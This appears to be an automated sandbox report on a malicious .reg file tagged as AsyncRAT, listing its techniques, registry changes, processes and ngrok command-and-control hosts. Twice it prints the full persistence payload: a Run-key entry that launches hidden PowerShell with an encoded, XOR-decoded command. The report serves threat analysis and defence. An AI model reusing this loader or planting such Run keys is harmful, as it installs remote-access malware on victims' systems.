Malware Analysis Report

2025-06-16 00:47

Sample ID 241107-1xq5esymaz
Target GWAesWUtovxi.reg
SHA256 92148c6f69a95bed4abcd9efb43b89f0bd7287b4f418583f0008771c72699386
Tags
persistence asyncrat default defense_evasion discovery execution privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

92148c6f69a95bed4abcd9efb43b89f0bd7287b4f418583f0008771c72699386

Threat Level: Known bad

The file GWAesWUtovxi.reg was found to be: Known bad.

Malicious Activity Summary

persistence asyncrat default defense_evasion discovery execution privilege_escalation rat

Asyncrat family

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

System Binary Proxy Execution: Regsvcs/Regasm

Blocklisted process makes network request

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Runs .reg file with regedit

Suspicious behavior: EnumeratesProcesses

Runs regedit.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies registry class

Kills process with taskkill

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 22:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 22:02

Reported

2024-11-07 22:04

Platform

win7-20240708-en

Max time kernel

117s

Max time network

118s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBkAEcASgA0AGYAMQBKAHIAWgBIAFYAbwBhAFYASgA1AFkAbQBaAG8AWQAxAEoAbABhAEgAOQBvAEsAaQAxAHcATgBpADEAawBhAEgAVQB0AEoAVwBSADYAZgB5ADAAZwBXAEgAOQBrAEwAVwBWADUAZQBYADEAKwBOAHkASQBpAGEARwBCADkAZQBYAFEAagBZADIAcAAvAFkAbQBZAGoAWgBHAEkAaQBmAG4AbAA0AGIAeQBOADUAZABYAGsAdABJAEYAaAArAGEARQA5AHMAZgBtAFIAdQBYAFcAeAAvAGYAbQBSAGoAYQBpADAAZwBSAFcAaABzAGEAVwBoAC8AZgBpADAAcABaAFcAaABzAGEAVwBoAC8AZgBpAFEAMgBMAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABQAGIASAA1AG8ATwB6AGsAdABNAEMAMABsAFMAbQBoADUASQBFAFIANQBhAEcAQgBkAGYAMgBKADkAYQBIADkANQBkAEMAMABnAFgAVwB4ADUAWgBTADAAcQBSAFUAWgBPAFcARABkAFIAWABtAEoAcgBlAFgAcABzAGYAMgBoAFIAUQB5AEoATQBLAGkAMABnAFEAMgB4AGcAYQBDADAAcQBhAEcATgB1AGYAMwBSADkAZQBTAG8AawBJADIAaABqAGIAbgA5ADAAZgBYAGsAMgBMAFMAbABtAGEASABRAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAwADUAaQBZADMAdABvAGYAMwBsAFEATgB6AGQATABmADIASgBnAFQAMgB4ACsAYQBEAHMANQBYAG4AbAAvAFoARwBOAHEASgBTAHAAZgBYADIAVgA1AGEAMwBSAEIAWAAzAHQANgBTAFUAUgBhAGEARwBoADMAZgBEADEAbwBaAG0ASgBNAE0ARABBAHEASgBEAFkAdABLAFcAUgA3AFUAbQB4AGoAYQBWAEoAcABiAEgAbABzAEwAVABBAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAE8AWQBtAE4ANwBhAEgAOQA1AFUARABjADMAUwAzADkAaQBZAEUAOQBzAGYAbQBnADcATwBWADUANQBmADIAUgBqAGEAaQBVAHAAYQBHAE4AdQBmADMAUgA5AGUAVwBoAHAAVAAyAHgAKwBhAEQAcwA1AEoARABZAHQASwBXAFIANwBMAFQAQQB0AEsAVwBSADcAVQBtAHgAagBhAFYASgBwAGIASABsAHMAVgBqADAAagBJAHoAdwA0AFUARABZAHQASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBWAEoAcABiAEgAbABzAEwAVABBAHQASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBWAGoAdwA3AEkAeQBNAHAAWgBIAHQAUwBiAEcATgBwAFUAbQBsAHMAZQBXAHcAagBRAFcAaABqAGEAbgBsAGwAVQBEAFkAdABLAFcAeABvAGYAaQAwAHcATABVAE4AbwBlAGkAQgBDAGIAMgBkAG8AYgBuAGsAdABYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBNAGEASAA1AEEAYgBHAE4AcwBhAG0AaABwAE4AaQAwAHAAYgBHAGgAKwBJADAAQgBpAGEAVwBnAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBPAFoASAAxAGwAYQBIADkAQQBZAG0AbABvAFUARABjADMAVABrADkATwBOAGkAMABwAGIARwBoACsASQAwAFoAbwBkAEMAMAB3AEwAUwBsAG0AYQBIAFEAMgBMAFMAbABzAGEASAA0AGoAUgBGAHMAdABNAEMAMABwAFoASABzADIATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAdABNAEMAMABwAGIARwBoACsASQAwADUALwBhAEcAeAA1AGEARQBsAG8AYgBuADkAMABmAFgAbABpAGYAeQBVAGsATgBpADAAcABhAFcAaAB1AFkAbQBsAG8AYQBVADkAMABlAFcAaAArAEwAVABBAHQASwBXAGwAbwBiAG4AOQAwAGYAWABsAGkAZgB5AE4AWgBmADIAeABqAGYAbQB0AGkAZgAyAEIATABaAEcATgBzAFkAVQA5AGgAWQBtADUAbQBKAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABTAGEAVwB4ADUAYgBDAEUAdABQAFMARQB0AEsAVwBoAGoAYgBuADkAMABmAFgAbABvAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBTAFEAMgBMAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AWgBhAEgAVgA1AEkAMABoAGoAYgBtAEoAcABaAEcATgBxAFUARABjADMAVwBGAGwATABOAFMATgBLAGEASABsAGUAZQBYADkAawBZADIAbwBsAEsAVwBsAG8AYgBtAEoAcABhAEcAbABQAGQASABsAG8AZgBpAFEAMgBMAFMAbAB2AGQASABsAG8AZgBpADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBUAG0ASgBqAGUAMgBoAC8AZQBWAEEAMwBOADAAdAAvAFkAbQBCAFAAYgBIADUAbwBPAHoAbABlAGUAWAA5AGsAWQAyAG8AbABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABiAEgANQBvAE8AegBrAGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGUAWQBXAGgAbwBmAFMAMABnAFgAbQBoAHUAWQBtAE4AcABmAGkAMAAvAE4AaQAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFQAQQB0AFYAbAA1ADAAZgBuAGwAbwBZAEMATgBFAFEAaQBOAGQAYgBIAGwAbABVAEQAYwAzAFMAbQBoADUAVwBXAGgAZwBmAFYAMQBzAGUAVwBVAGwASgBDADAAbQBMAFMAcABmAGEARwBwAE0AZgBtAEEAagBhAEgAVgBvAEsAagBZAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAEUAUQBpAE4ATABaAEcARgBvAFUARABjADMAVwBuADkAawBlAFcAaABNAFkAVwBGAFAAZABIAGwAbwBmAGkAVQBwAGUAVwBoAGcAZgBVAHQAawBZAFcAaABkAGIASABsAGwASQBTADAAcABiADMAUgA1AGEASAA0AGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGQAZgAyAEoAdQBhAEgANQArAEwAUwBCAEwAWgBHAEYAbwBYAFcAeAA1AFoAUwAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFMAQgBhAFoARwBOAHAAWQBuAHAAZQBlAFgAUgBoAGEAQwAxAEYAWgBHAGwAcABhAEcATQA9ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" C:\Windows\regedit.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Processes

C:\Windows\regedit.exe

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

Network

N/A

Files

memory/1908-0-0x0000000000160000-0x0000000000161000-memory.dmp

memory/1908-1-0x0000000000160000-0x0000000000161000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 22:02

Reported

2024-11-07 22:04

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

145s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Binary Proxy Execution: Regsvcs/Regasm

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\RegAsm.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBkAEcASgA0AGYAMQBKAHIAWgBIAFYAbwBhAFYASgA1AFkAbQBaAG8AWQAxAEoAbABhAEgAOQBvAEsAaQAxAHcATgBpADEAawBhAEgAVQB0AEoAVwBSADYAZgB5ADAAZwBXAEgAOQBrAEwAVwBWADUAZQBYADEAKwBOAHkASQBpAGEARwBCADkAZQBYAFEAagBZADIAcAAvAFkAbQBZAGoAWgBHAEkAaQBmAG4AbAA0AGIAeQBOADUAZABYAGsAdABJAEYAaAArAGEARQA5AHMAZgBtAFIAdQBYAFcAeAAvAGYAbQBSAGoAYQBpADAAZwBSAFcAaABzAGEAVwBoAC8AZgBpADAAcABaAFcAaABzAGEAVwBoAC8AZgBpAFEAMgBMAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABQAGIASAA1AG8ATwB6AGsAdABNAEMAMABsAFMAbQBoADUASQBFAFIANQBhAEcAQgBkAGYAMgBKADkAYQBIADkANQBkAEMAMABnAFgAVwB4ADUAWgBTADAAcQBSAFUAWgBPAFcARABkAFIAWABtAEoAcgBlAFgAcABzAGYAMgBoAFIAUQB5AEoATQBLAGkAMABnAFEAMgB4AGcAYQBDADAAcQBhAEcATgB1AGYAMwBSADkAZQBTAG8AawBJADIAaABqAGIAbgA5ADAAZgBYAGsAMgBMAFMAbABtAGEASABRAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAwADUAaQBZADMAdABvAGYAMwBsAFEATgB6AGQATABmADIASgBnAFQAMgB4ACsAYQBEAHMANQBYAG4AbAAvAFoARwBOAHEASgBTAHAAZgBYADIAVgA1AGEAMwBSAEIAWAAzAHQANgBTAFUAUgBhAGEARwBoADMAZgBEADEAbwBaAG0ASgBNAE0ARABBAHEASgBEAFkAdABLAFcAUgA3AFUAbQB4AGoAYQBWAEoAcABiAEgAbABzAEwAVABBAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAE8AWQBtAE4ANwBhAEgAOQA1AFUARABjADMAUwAzADkAaQBZAEUAOQBzAGYAbQBnADcATwBWADUANQBmADIAUgBqAGEAaQBVAHAAYQBHAE4AdQBmADMAUgA5AGUAVwBoAHAAVAAyAHgAKwBhAEQAcwA1AEoARABZAHQASwBXAFIANwBMAFQAQQB0AEsAVwBSADcAVQBtAHgAagBhAFYASgBwAGIASABsAHMAVgBqADAAagBJAHoAdwA0AFUARABZAHQASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBWAEoAcABiAEgAbABzAEwAVABBAHQASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBWAGoAdwA3AEkAeQBNAHAAWgBIAHQAUwBiAEcATgBwAFUAbQBsAHMAZQBXAHcAagBRAFcAaABqAGEAbgBsAGwAVQBEAFkAdABLAFcAeABvAGYAaQAwAHcATABVAE4AbwBlAGkAQgBDAGIAMgBkAG8AYgBuAGsAdABYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBNAGEASAA1AEEAYgBHAE4AcwBhAG0AaABwAE4AaQAwAHAAYgBHAGgAKwBJADAAQgBpAGEAVwBnAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBPAFoASAAxAGwAYQBIADkAQQBZAG0AbABvAFUARABjADMAVABrADkATwBOAGkAMABwAGIARwBoACsASQAwAFoAbwBkAEMAMAB3AEwAUwBsAG0AYQBIAFEAMgBMAFMAbABzAGEASAA0AGoAUgBGAHMAdABNAEMAMABwAFoASABzADIATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAdABNAEMAMABwAGIARwBoACsASQAwADUALwBhAEcAeAA1AGEARQBsAG8AYgBuADkAMABmAFgAbABpAGYAeQBVAGsATgBpADAAcABhAFcAaAB1AFkAbQBsAG8AYQBVADkAMABlAFcAaAArAEwAVABBAHQASwBXAGwAbwBiAG4AOQAwAGYAWABsAGkAZgB5AE4AWgBmADIAeABqAGYAbQB0AGkAZgAyAEIATABaAEcATgBzAFkAVQA5AGgAWQBtADUAbQBKAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABTAGEAVwB4ADUAYgBDAEUAdABQAFMARQB0AEsAVwBoAGoAYgBuADkAMABmAFgAbABvAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBTAFEAMgBMAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AWgBhAEgAVgA1AEkAMABoAGoAYgBtAEoAcABaAEcATgBxAFUARABjADMAVwBGAGwATABOAFMATgBLAGEASABsAGUAZQBYADkAawBZADIAbwBsAEsAVwBsAG8AYgBtAEoAcABhAEcAbABQAGQASABsAG8AZgBpAFEAMgBMAFMAbAB2AGQASABsAG8AZgBpADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBUAG0ASgBqAGUAMgBoAC8AZQBWAEEAMwBOADAAdAAvAFkAbQBCAFAAYgBIADUAbwBPAHoAbABlAGUAWAA5AGsAWQAyAG8AbABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABiAEgANQBvAE8AegBrAGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGUAWQBXAGgAbwBmAFMAMABnAFgAbQBoAHUAWQBtAE4AcABmAGkAMAAvAE4AaQAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFQAQQB0AFYAbAA1ADAAZgBuAGwAbwBZAEMATgBFAFEAaQBOAGQAYgBIAGwAbABVAEQAYwAzAFMAbQBoADUAVwBXAGgAZwBmAFYAMQBzAGUAVwBVAGwASgBDADAAbQBMAFMAcABmAGEARwBwAE0AZgBtAEEAagBhAEgAVgBvAEsAagBZAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAEUAUQBpAE4ATABaAEcARgBvAFUARABjADMAVwBuADkAawBlAFcAaABNAFkAVwBGAFAAZABIAGwAbwBmAGkAVQBwAGUAVwBoAGcAZgBVAHQAawBZAFcAaABkAGIASABsAGwASQBTADAAcABiADMAUgA1AGEASAA0AGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGQAZgAyAEoAdQBhAEgANQArAEwAUwBCAEwAWgBHAEYAbwBYAFcAeAA1AFoAUwAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFMAQgBhAFoARwBOAHAAWQBuAHAAZQBlAFgAUgBoAGEAQwAxAEYAWgBHAGwAcABhAEcATQA9ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" C:\Windows\regedit.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A empty.ngrok.io N/A N/A
N/A empty.ngrok.io N/A N/A
N/A 4.tcp.eu.ngrok.io N/A N/A
N/A 4.tcp.eu.ngrok.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\regedit.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\regedit.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
